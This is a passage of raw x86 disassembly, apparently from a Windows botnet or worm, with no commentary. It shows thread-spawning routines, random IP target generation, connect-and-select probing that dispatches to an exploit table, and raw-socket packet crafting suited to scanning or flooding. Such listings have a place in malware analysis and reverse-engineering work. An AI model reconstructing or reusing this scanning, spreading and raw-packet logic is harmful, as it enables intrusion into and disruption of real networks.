jnz short loc_40C1E0
lea eax, [ebp+Format]
push eax ; Source
push offset byte_4E5528 ; Dest
call _strncpy
add esp, 0Ch
mov dword_4E55AC, 1
jmp short loc_40C1FA
; ---------------------------------------------------------------------------
loc_40C1E0: ; CODE XREF: sub_40C12D+94�j
lea eax, [ebp+arg_90]
push eax ; Source
push offset byte_4E5528 ; Dest
call _strncpy
add esp, 0Ch
mov dword_4E55AC, ebx
loc_40C1FA: ; CODE XREF: sub_40C12D+B1�j
push esi
lea eax, [ebp+Source]
push dword_4E5524
push offset asc_44874C ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push 5 ; int
push eax ; Source
call sub_40B756
add esp, 1Ch
mov dword_4E551C, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4E5310
push offset sub_412217
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, dword_4E551C
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_40C268
loc_40C256: ; CODE XREF: sub_40C12D+139�j
cmp dword_4E55B0, ebx
jnz short loc_40C283
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_40C256
; ---------------------------------------------------------------------------
loc_40C268: ; CODE XREF: sub_40C12D+127�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset asc_448780 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40C283: ; CODE XREF: sub_40C12D+12F�j
lea eax, [ebp+Source]
push eax
call sub_415C3F
mov eax, dword_4E2E18
mov esi, offset dword_4E55BC
mov [esp+210h+var_210], 104h
push esi
push ebx
mov dword_4E57CC, eax
mov dword_4E57C8, ebx
call ds:dword_4F5344 ; GetModuleFileNameA
push 103h ; Count
push edi ; Source
push offset byte_4E56C0 ; Dest
call _strncpy
mov eax, [ebp+arg_110]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov dword_4E55B8, eax
mov eax, [ebp+arg_138]
pop edi
mov dword_4E5850, eax
push 7Fh ; Count
jnz short loc_40C304
lea eax, [ebp+Format]
push eax ; Source
push offset byte_4E57D0 ; Dest
call _strncpy
add esp, 0Ch
mov dword_4E5854, 1
jmp short loc_40C31E
; ---------------------------------------------------------------------------
loc_40C304: ; CODE XREF: sub_40C12D+1B8�j
lea eax, [ebp+arg_90]
push eax ; Source
push offset byte_4E57D0 ; Dest
call _strncpy
add esp, 0Ch
mov dword_4E5854, ebx
loc_40C31E: ; CODE XREF: sub_40C12D+1D5�j
push esi
lea eax, [ebp+Source]
push dword_4E57CC
push offset asc_4487B4 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push 4 ; int
push eax ; Source
call sub_40B756
add esp, 1Ch
mov dword_4E57C4, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4E55B8
push offset sub_40F402
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, dword_4E57C4
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_40C38C
loc_40C37A: ; CODE XREF: sub_40C12D+25D�j
cmp dword_4E5858, ebx
jnz short loc_40C3A7
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_40C37A
; ---------------------------------------------------------------------------
loc_40C38C: ; CODE XREF: sub_40C12D+24B�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset asc_4487E8 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40C3A7: ; CODE XREF: sub_40C12D+253�j
lea eax, [ebp+Source]
push eax
call sub_415C3F
pop ecx
loc_40C3B4: ; CODE XREF: sub_40C12D+35�j
mov eax, [ebp+arg_130]
mov ecx, eax
shl ecx, 6
cmp dword_448234[ecx], ebx
jz loc_40C4DD
push 7
call sub_40B99E
test eax, eax
pop ecx
jnz loc_40C4D7
mov eax, dword_4E5E6C
cmp [ebp+arg_90], bl
mov dword_4E527C, eax
mov eax, [ebp+arg_110]
mov dword_4E5270, eax
mov eax, [ebp+arg_138]
mov dword_4E5278, ebx
mov dword_4E5300, eax
push 7Fh ; Count
jnz short loc_40C428
lea eax, [ebp+Format]
push eax ; Source
push offset byte_4E5280 ; Dest
call _strncpy
add esp, 0Ch
mov dword_4E5304, 1
jmp short loc_40C442
; ---------------------------------------------------------------------------
loc_40C428: ; CODE XREF: sub_40C12D+2DC�j
lea eax, [ebp+arg_90]
push eax ; Source
push offset byte_4E5280 ; Dest
call _strncpy
add esp, 0Ch
mov dword_4E5304, ebx
loc_40C442: ; CODE XREF: sub_40C12D+2F9�j
push dword_4E527C
lea eax, [ebp+Source]
push offset asc_44881C ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push 7 ; int
push eax ; Source
call sub_40B756
add esp, 18h
mov dword_4E5274, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4E5270
push offset sub_40F160
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, dword_4E5274
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_40C4AF
loc_40C49D: ; CODE XREF: sub_40C12D+380�j
cmp dword_4E5308, ebx
jnz short loc_40C4CA
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_40C49D
; ---------------------------------------------------------------------------
loc_40C4AF: ; CODE XREF: sub_40C12D+36E�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset asc_44884C ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40C4CA: ; CODE XREF: sub_40C12D+376�j
lea eax, [ebp+Source]
push eax
call sub_415C3F
pop ecx
loc_40C4D7: ; CODE XREF: sub_40C12D+2A8�j
mov eax, [ebp+arg_130]
loc_40C4DD: ; CODE XREF: sub_40C12D+298�j
shl eax, 6
cmp dword_448230[eax], ebx
jz loc_40C5FF
push 3
call sub_40B99E
test eax, eax
pop ecx
jnz loc_40C5FF
mov esi, offset byte_4E5AEC
push 104h
push esi
push ebx
call ds:dword_4F5344 ; GetModuleFileNameA
push 5Ch ; Ch
push esi ; Str
call _strrchr
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40C51E
mov [eax], bl
loc_40C51E: ; CODE XREF: sub_40C12D+3ED�j
mov eax, dword_43F07C
mov dword_4E5C04, ebx
mov dword_4E5BF0, eax
lea eax, [ebp+Format]
push eax ; Format
push offset byte_4E5864 ; Dest
call _sprintf
mov eax, [ebp+arg_110]
pop ecx
pop ecx
mov dword_4E5860, eax
mov ecx, [ebp+arg_138]
push esi
push dword_4E5BF0
mov dword_4E5BFC, ecx
mov ecx, [ebp+arg_13C]
push eax
mov dword_4E5C00, ecx
call sub_40AF71
pop ecx
push eax
lea eax, [ebp+Source]
push offset asc_448884 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push 3 ; int
push eax ; Source
call sub_40B756
add esp, 20h
mov dword_4E5BF8, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4E5860
push offset sub_40FB50
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, dword_4E5BF8
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_40C5D7
loc_40C5C5: ; CODE XREF: sub_40C12D+4A8�j
cmp dword_4E5C0C, ebx
jnz short loc_40C5F2
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_40C5C5
; ---------------------------------------------------------------------------
loc_40C5D7: ; CODE XREF: sub_40C12D+496�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset asc_4488C0 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40C5F2: ; CODE XREF: sub_40C12D+49E�j
lea eax, [ebp+Source]
push eax
call sub_415C3F
pop ecx
loc_40C5FF: ; CODE XREF: sub_40C12D+14�j
; sub_40C12D+25�j ...
pop esi
pop ebx
leave
retn
sub_40C12D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40C603(int Dst)
sub_40C603 proc near ; CODE XREF: sub_40C951:loc_40C9C2�p
Dst = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+Dst]
push esi
push 4 ; Size
lea esi, dword_4E3258[eax*8]
lea eax, [ebp+Dst]
push esi ; Src
push eax ; Dst
call _memcpy
add esp, 0Ch
push [ebp+Dst]
call dword_4E3020 ; htonl
inc eax
push eax
mov [ebp+Dst], eax
call dword_4E30F4 ; htonl
mov [ebp+Dst], eax
lea eax, [ebp+Dst]
push 4 ; Size
push eax ; Src
push esi ; Dst
call _memcpy
mov eax, [esi]
add esp, 0Ch
pop esi
pop ebp
retn
sub_40C603 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40C64B(char *Src,int)
sub_40C64B proc near ; CODE XREF: sub_40C951+69�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Src = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
or esi, 0FFFFFFFFh
push [ebp+Src] ; Str
mov [ebp+var_C], esi
mov [ebp+var_8], esi
mov [ebp+var_4], esi
mov [ebp+var_10], esi
call _strlen
cmp eax, 0Fh
pop ecx
jbe short loc_40C673
xor eax, eax
jmp short loc_40C6E4
; ---------------------------------------------------------------------------
loc_40C673: ; CODE XREF: sub_40C64B+22�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
push offset aD_D_D_D_0 ; "%d.%d.%d.%d"
push [ebp+Src] ; Src
call _sscanf
add esp, 18h
cmp [ebp+var_C], esi
jnz short loc_40C6A0
call _rand
mov [ebp+var_C], eax
loc_40C6A0: ; CODE XREF: sub_40C64B+4B�j
cmp [ebp+var_8], esi
jnz short loc_40C6AD
call _rand
mov [ebp+var_8], eax
loc_40C6AD: ; CODE XREF: sub_40C64B+58�j
cmp [ebp+var_4], esi
jnz short loc_40C6BA
call _rand
mov [ebp+var_4], eax
loc_40C6BA: ; CODE XREF: sub_40C64B+65�j
mov eax, [ebp+var_10]
cmp eax, esi
jnz short loc_40C6C6
call _rand
loc_40C6C6: ; CODE XREF: sub_40C64B+74�j
shl eax, 8
add eax, [ebp+var_4]
mov ecx, [ebp+var_C]
shl eax, 8
add eax, [ebp+var_8]
shl eax, 8
add eax, ecx
mov ecx, [ebp+arg_4]
mov dword_4E3258[ecx*8], eax
loc_40C6E4: ; CODE XREF: sub_40C64B+26�j
pop esi
leave
retn
sub_40C64B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C6E7 proc near ; CODE XREF: sub_40BF01+59�p
; sub_40C951+BB�p ...
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
push 1
pop edi
xor ebx, ebx
push ebx
push edi
push 2
mov [ebp+var_4], edi
call dword_4E3178 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_40C710
xor eax, eax
jmp short loc_40C77F
; ---------------------------------------------------------------------------
loc_40C710: ; CODE XREF: sub_40C6E7+23�j
mov eax, [ebp+arg_0]
push [ebp+arg_4]
mov [ebp+var_1C], 2
mov [ebp+var_18], eax
call dword_4E30F8 ; htons
mov [ebp+var_1A], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push esi
call dword_4E3194 ; ioctlsocket
lea eax, [ebp+var_1C]
push 10h
push eax
push esi
call dword_4E30A0 ; connect
mov eax, [ebp+arg_8]
mov [ebp+var_8], ebx
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_120]
push ebx
push eax
push ebx
push ebx
mov [ebp+var_11C], esi
mov [ebp+var_120], edi
call dword_4E30E0 ; select
push esi
mov edi, eax
call dword_4E3190 ; closesocket
xor eax, eax
cmp edi, ebx
setnle al
loc_40C77F: ; CODE XREF: sub_40C6E7+27�j
pop edi
pop esi
pop ebx
leave
retn
sub_40C6E7 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 10110h
call __alloca_probe
push ebx
push esi
push edi
mov edi, 2649h
push edi
call dword_4E30F8 ; htons
push dword ptr [ebp+10h]
mov [ebp-28h], ax
call dword_4E30F8 ; htons
mov [ebp-26h], ax
call _rand
xor ebx, ebx
push 200h
mov [ebp-24h], eax
mov [ebp-20h], ebx
mov [ebp-1Ch], bx
mov [ebp-0Ch], bx
mov word ptr [ebp-1Ah], 5
mov [ebp-18h], bx
mov word ptr [ebp-16h], 1
mov [ebp-14h], bx
mov [ebp-12h], bx
mov [ebp-10h], bx
mov [ebp-0Eh], bx
call dword_4E30F8 ; htons
mov esi, [ebp+0Ch]
mov [ebp-0Ah], ax
mov eax, [ebp+8]
push 24h
mov [ebp-8], bx
mov [ebp-6], bx
mov [ebp-58h], eax
mov [ebp-54h], esi
mov [ebp-50h], bl
mov byte ptr [ebp-4Fh], 6
call dword_4E30F8 ; htons
mov [ebp-4Eh], ax
lea eax, [ebp-28h]
push 24h
push eax
lea eax, [ebp-4Ch]
push eax
call _memcpy
lea eax, [ebp-58h]
push 20h
push eax
call sub_40AFCA
mov [ebp-8], ax
push 10h
lea eax, [ebp-38h]
push ebx
push eax
call _memset
add esp, 20h
mov word ptr [ebp-38h], 2
push dword ptr [ebp+10h]
call dword_4E30F8 ; htons
push 6
push 3
push 2
mov [ebp-36h], ax
mov [ebp-34h], esi
mov dword ptr [ebp-4], 10h
call dword_4E3178 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_40C883
push offset aSocketOpenFail ; "socket open failed"
jmp loc_40C944
; ---------------------------------------------------------------------------
loc_40C883: ; CODE XREF: .text:0040C877�j
push dword ptr [ebp-4]
lea eax, [ebp-38h]
push eax
push ebx
lea eax, [ebp-28h]
push 24h
push eax
push esi
call dword_4E315C ; sendto
cmp eax, 14h
mov [ebp+10h], eax
jz short loc_40C8CC
call dword_4E308C ; WSAGetLastError
push eax
lea eax, [ebp-0D8h]
push dword ptr [ebp+10h]
push offset aSendtoSocketFa ; "sendto() socket failed. sent = %d <%d>."...
push eax
call _sprintf
lea eax, [ebp-0D8h]
push eax
call sub_415C3F
add esp, 14h
jmp short loc_40C915
; ---------------------------------------------------------------------------
loc_40C8CC: ; CODE XREF: .text:0040C89E�j
push 10038h
lea eax, [ebp-10110h]
push ebx
push eax
call _memset
add esp, 0Ch
loc_40C8E1: ; CODE XREF: .text:0040C908�j
cmp [ebp-100FAh], di
jz short loc_40C91E
lea eax, [ebp-4]
push eax
lea eax, [ebp-38h]
push eax
push ebx
lea eax, [ebp-10110h]
push 10038h
push eax
push esi
call dword_4E30D0 ; recvfrom
test eax, eax
jge short loc_40C8E1
push offset aRecvfromSocket ; "recvfrom() socket failed"
call sub_415C3F
pop ecx
loc_40C915: ; CODE XREF: .text:0040C8CA�j
push esi
call dword_4E3190 ; closesocket
jmp short loc_40C94A
; ---------------------------------------------------------------------------
loc_40C91E: ; CODE XREF: .text:0040C8E8�j
push esi
call dword_4E3190 ; closesocket
cmp word ptr [ebp-100EAh], 1
jnz short loc_40C93F
push offset aSocketOpen_ ; "Socket open."
call sub_415C3F
pop ecx
push 1
pop eax
jmp short loc_40C94C
; ---------------------------------------------------------------------------
loc_40C93F: ; CODE XREF: .text:0040C92D�j
push offset aSocketClosed_ ; "Socket closed."
loc_40C944: ; CODE XREF: .text:0040C87E�j
call sub_415C3F
pop ecx
loc_40C94A: ; CODE XREF: .text:0040C91C�j
xor eax, eax
loc_40C94C: ; CODE XREF: .text:0040C93D�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C951 proc near ; DATA XREF: sub_40CB69+13B�o
var_2A8 = dword ptr -2A8h
Dest = byte ptr -28Ch
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_1F8 = byte ptr -1F8h
var_178 = byte ptr -178h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
Src = byte ptr -150h
var_140 = byte ptr -140h
Str = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
mov esi, eax
pop ecx
lea edi, [ebp+Src]
rep movsd
mov esi, [ebp+var_2C]
mov dword ptr [eax+148h], 1
mov eax, [ebp+var_28]
mov [ebp+var_4], esi
mov [ebp+arg_0], eax
call ds:dword_4F537C ; GetTickCount
push eax ; Seed
call _srand
mov ebx, esi
pop ecx
imul ebx, 234h
loc_40C998: ; CODE XREF: sub_40C951+204�j
mov eax, dword_45601C[ebx]
cmp dword_4E325C[eax*8], 0
jz loc_40CB5A
cmp [ebp+var_10], 0
push eax ; Dst
jz short loc_40C9C2
lea eax, [ebp+Src]
push eax ; Src
call sub_40C64B
pop ecx
jmp short loc_40C9C7
; ---------------------------------------------------------------------------
loc_40C9C2: ; CODE XREF: sub_40C951+60�j
call sub_40C603
loc_40C9C7: ; CODE XREF: sub_40C951+6F�j
pop ecx
mov edi, eax
push [ebp+arg_0]
push dword_45601C[ebx]
push [ebp+var_3C]
push edi
call dword_4E3184 ; inet_ntoa
push eax
lea eax, [ebp+Dest]
push offset asc_448978 ; "-"
push eax ; Dest
call _sprintf
add esp, 18h
lea eax, [ebp+Dest]
push eax ; Format
lea eax, dword_455E18[ebx]
push eax ; Dest
call _sprintf
push [ebp+var_38]
push [ebp+var_3C]
push edi
call sub_40C6E7
add esp, 14h
cmp eax, 1
jnz loc_40CB4A
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_40CA9E
push offset dword_4E5258
call ds:dword_4F53A8 ; RtlEnterCriticalSection
push [ebp+var_3C]
push edi
call dword_4E3184 ; inet_ntoa
push eax
lea eax, [ebp+Dest]
push offset asc_4489B0 ; "-"
push eax ; Dest
call _sprintf
add esp, 10h
cmp [ebp+var_14], 0
jnz short loc_40CA80
cmp [ebp+Str], 0
push 1 ; int
push [ebp+var_18] ; int
lea eax, [ebp+Dest]
push eax ; int
lea eax, [ebp+Str]
jnz short loc_40CA74
lea eax, [ebp+var_140]
loc_40CA74: ; CODE XREF: sub_40C951+11B�j
push eax ; Str
push [ebp+var_40] ; int
call sub_409D34
add esp, 14h
loc_40CA80: ; CODE XREF: sub_40C951+100�j
lea eax, [ebp+Dest]
push eax
call sub_415C3F
mov [esp+2A8h+var_2A8], offset dword_4E5258
call ds:dword_4F53A4 ; RtlLeaveCriticalSection
jmp loc_40CB4A
; ---------------------------------------------------------------------------
loc_40CA9E: ; CODE XREF: sub_40C951+D0�j
push edi
call dword_4E3184 ; inet_ntoa
push eax ; Format
lea eax, [ebp+var_208]
push eax ; Dest
call _sprintf
mov eax, [ebp+var_20]
pop ecx
shl eax, 6
pop ecx
add eax, offset aSym ; "sym"
push eax ; Format
lea eax, [ebp+var_178]
push eax ; Dest
call _sprintf
cmp [ebp+Str], 0
pop ecx
pop ecx
lea eax, [ebp+Str]
jnz short loc_40CAE3
lea eax, [ebp+var_140]
loc_40CAE3: ; CODE XREF: sub_40C951+18A�j
push eax ; Format
lea eax, [ebp+var_1F8]
push eax ; Dest
call _sprintf
mov eax, [ebp+var_40]
pop ecx
mov [ebp+var_20C], eax
mov eax, [ebp+var_18]
pop ecx
mov [ebp+var_15C], eax
mov eax, [ebp+var_14]
sub esp, 0BCh
mov [ebp+var_158], eax
mov eax, [ebp+var_3C]
push 2Fh
mov [ebp+var_16C], eax
mov eax, [ebp+var_20]
pop ecx
mov [ebp+var_168], esi
mov [ebp+var_164], eax
lea esi, [ebp+var_20C]
mov edi, esp
shl eax, 6
rep movsd
call off_448224[eax]
mov esi, [ebp+var_4]
add esp, 0BCh
loc_40CB4A: ; CODE XREF: sub_40C951+C6�j
; sub_40C951+148�j
push 7D0h
call ds:dword_4F534C ; Sleep
jmp loc_40C998
; ---------------------------------------------------------------------------
loc_40CB5A: ; CODE XREF: sub_40C951+55�j
push esi
call sub_40BA72
pop ecx
push 0
call ds:dword_4F53A0 ; ExitThread
sub_40C951 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CB69 proc near ; DATA XREF: sub_401CC7+1F72�o
; sub_401CC7+5CC9�o
var_1DC = dword ptr -1DCh
Source = byte ptr -1CCh
var_14C = byte ptr -14Ch
Str = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1CCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
mov esi, eax
pop ecx
lea edi, [ebp+var_14C]
push 1
pop ebx
rep movsd
mov [eax+144h], ebx
lea eax, [ebp+var_14C]
push eax
call dword_4E3138 ; inet_addr
mov ecx, [ebp+var_2C]
sub esp, 14Ch
lea esi, [ebp+var_14C]
push 53h
mov dword_4E3258[ecx*8], eax
pop ecx
mov edi, esp
rep movsd
call sub_40C12D
push 0Bh
call sub_40B99E
add esp, 150h
cmp eax, ebx
jnz short loc_40CC37
mov esi, offset dword_4E5258
push esi
call ds:dword_4F53B0 ; RtlDeleteCriticalSection
push 80000400h
push esi
call ds:dword_4F53AC ; InitializeCriticalSectionAndSpinCount
test eax, eax
jnz short loc_40CC37
lea eax, [ebp+Source]
push offset asc_4489D8 ; "-"
push eax ; Dest
call _sprintf
xor ebx, ebx
pop ecx
cmp [ebp+var_10], ebx
pop ecx
jnz short loc_40CC21
push ebx ; int
lea eax, [ebp+Source]
push [ebp+var_14] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_3C] ; int
call sub_409D34
add esp, 14h
loc_40CC21: ; CODE XREF: sub_40CB69+99�j
lea eax, [ebp+Source]
push eax
call sub_415C3F
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_40CC37: ; CODE XREF: sub_40CB69+63�j
; sub_40CB69+7F�j
mov eax, [ebp+var_2C]
mov esi, ds:dword_4F534C
mov edi, ebx
mov dword_4E325C[eax*8], ebx
xor ebx, ebx
cmp [ebp+var_20], 1
jb loc_40CD04
loc_40CC55: ; CODE XREF: sub_40CB69+195�j
push edi
lea eax, [ebp+var_14C]
push [ebp+var_2C]
mov [ebp+var_24], edi
push [ebp+var_38]
push eax
lea eax, [ebp+Source]
push offset asc_448A0C ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push 0Bh ; int
push eax ; Source
call sub_40B756
mov [ebp+var_28], eax
imul eax, 234h
mov ecx, [ebp+var_2C]
add esp, 24h
mov dword_45601C[eax], ecx
lea eax, [ebp+var_14C]
push ebx
push ebx
push eax
push offset sub_40C951
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_28]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_40CCCF
loc_40CCC4: ; CODE XREF: sub_40CB69+164�j
cmp [ebp+var_4], ebx
jnz short loc_40CCF6
push 1Eh
call esi ; Sleep
jmp short loc_40CCC4
; ---------------------------------------------------------------------------
loc_40CCCF: ; CODE XREF: sub_40CB69+159�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset asc_448A40 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Source]
push eax
call sub_415C3F
add esp, 10h
loc_40CCF6: ; CODE XREF: sub_40CB69+15E�j
push 1Eh
call esi ; Sleep
inc edi
cmp edi, [ebp+var_20]
jbe loc_40CC55
loc_40CD04: ; CODE XREF: sub_40CB69+E6�j
cmp [ebp+var_30], ebx
jz loc_40CDAE
mov eax, [ebp+var_30]
imul eax, 0EA60h
push eax
call esi ; Sleep
loc_40CD19: ; CODE XREF: sub_40CB69+250�j
push [ebp+var_30]
mov eax, [ebp+var_2C]
push [ebp+var_38]
mov eax, dword_4E3258[eax*8]
push eax
call dword_4E3184 ; inet_ntoa
push eax
lea eax, [ebp+Source]
push offset asc_448A78 ; "-"
push eax ; Dest
call _sprintf
add esp, 14h
cmp [ebp+var_10], ebx
jnz short loc_40CD67
push ebx ; int
lea eax, [ebp+Source]
push [ebp+var_14] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_3C] ; int
call sub_409D34
add esp, 14h
loc_40CD67: ; CODE XREF: sub_40CB69+1DF�j
lea eax, [ebp+Source]
push eax
call sub_415C3F
mov eax, [ebp+var_2C]
mov [esp+1DCh+var_1DC], 0BB8h
mov dword_4E325C[eax*8], ebx
call esi ; Sleep
push 0Bh
call sub_40B99E
cmp eax, 1
pop ecx
jnz short loc_40CD9E
push offset dword_4E5258
call ds:dword_4F53B0 ; RtlDeleteCriticalSection
loc_40CD9E: ; CODE XREF: sub_40CB69+228�j
push [ebp+var_2C]
call sub_40BA72
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
loc_40CDAE: ; CODE XREF: sub_40CB69+19E�j
; sub_40CB69+25D�j
mov eax, [ebp+var_2C]
cmp dword_4E325C[eax*8], 1
jnz loc_40CD19
push 7D0h
call esi ; Sleep
jmp short loc_40CDAE
sub_40CB69 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CDC8 proc near ; DATA XREF: sub_40CE95+7B�o
; sub_40CF86+7B�o
var_BC = dword ptr -0BCh
Str = byte ptr -0B8h
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0BCh
mov eax, [ebp+arg_0]
push esi
push edi
push 2Bh
pop ecx
mov esi, eax
lea edi, [ebp+var_BC]
push 1
rep movsd
pop esi
mov [eax+0A8h], esi
push 10h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_38]
call dword_4E30F8 ; htons
mov [ebp+var_E], ax
mov eax, [ebp+var_28]
push 6
push esi
push 2
mov [ebp+var_C], eax
call dword_4E3178 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40CE86
lea eax, [ebp+Dst]
push 10h
push eax
push esi
call dword_4E30A0 ; connect
mov ecx, [ebp+var_2C]
imul ecx, 234h
cmp eax, 0FFFFFFFFh
mov dword_456024[ecx], esi
jz short loc_40CE86
push [ebp+var_38]
push [ebp+var_28]
call dword_4E3184 ; inet_ntoa
push eax
mov edi, offset byte_4E5C1C
push offset asc_448AB8 ; "-"
push edi ; Dest
call _sprintf
push 0 ; int
lea eax, [ebp+Str]
push [ebp+var_20] ; int
push edi ; int
push eax ; Str
push [ebp+var_BC] ; int
call sub_409D34
push edi
call sub_415C3F
add esp, 28h
loc_40CE86: ; CODE XREF: sub_40CDC8+5D�j
; sub_40CDC8+7E�j
push esi
call dword_4E3190 ; closesocket
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_40CDC8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; int __cdecl sub_40CE95(int Dst)
sub_40CE95 proc near ; DATA XREF: sub_401CC7+60BF�o
Dest = byte ptr -134h
var_B4 = byte ptr -0B4h
var_30 = dword ptr -30h
var_24 = dword ptr -24h
Src = dword ptr -20h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
Dst = dword ptr 8
push ebp
mov ebp, esp
sub esp, 134h
push ebx
mov ebx, [ebp+Dst]
push esi
push edi
push 2Bh
mov esi, ebx
pop ecx
lea edi, [ebp+var_B4]
rep movsd
mov esi, ds:dword_4F534C
mov dword ptr [ebx+0A4h], 1
xor edi, edi
loc_40CEC3: ; CODE XREF: sub_40CE95+EC�j
push [ebp+var_30]
push [ebp+Src]
call dword_4E3184 ; inet_ntoa
push eax
lea eax, [ebp+Dest]
push offset asc_448AE0 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
push 1FFh ; Count
push eax ; Source
mov eax, [ebp+var_24]
imul eax, 234h
add eax, offset dword_455E18
push eax ; Dest
call _strncpy
add esp, 1Ch
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_B4]
push edi
push eax
push offset sub_40CDC8
push edi
push edi
call ds:dword_4F5350 ; CreateThread
cmp eax, edi
mov [ebp+var_4], eax
jz short loc_40CF2F
loc_40CF24: ; CODE XREF: sub_40CE95+98�j
cmp [ebp+var_C], edi
jnz short loc_40CF2F
push 32h
call esi ; Sleep
jmp short loc_40CF24
; ---------------------------------------------------------------------------
loc_40CF2F: ; CODE XREF: sub_40CE95+8D�j
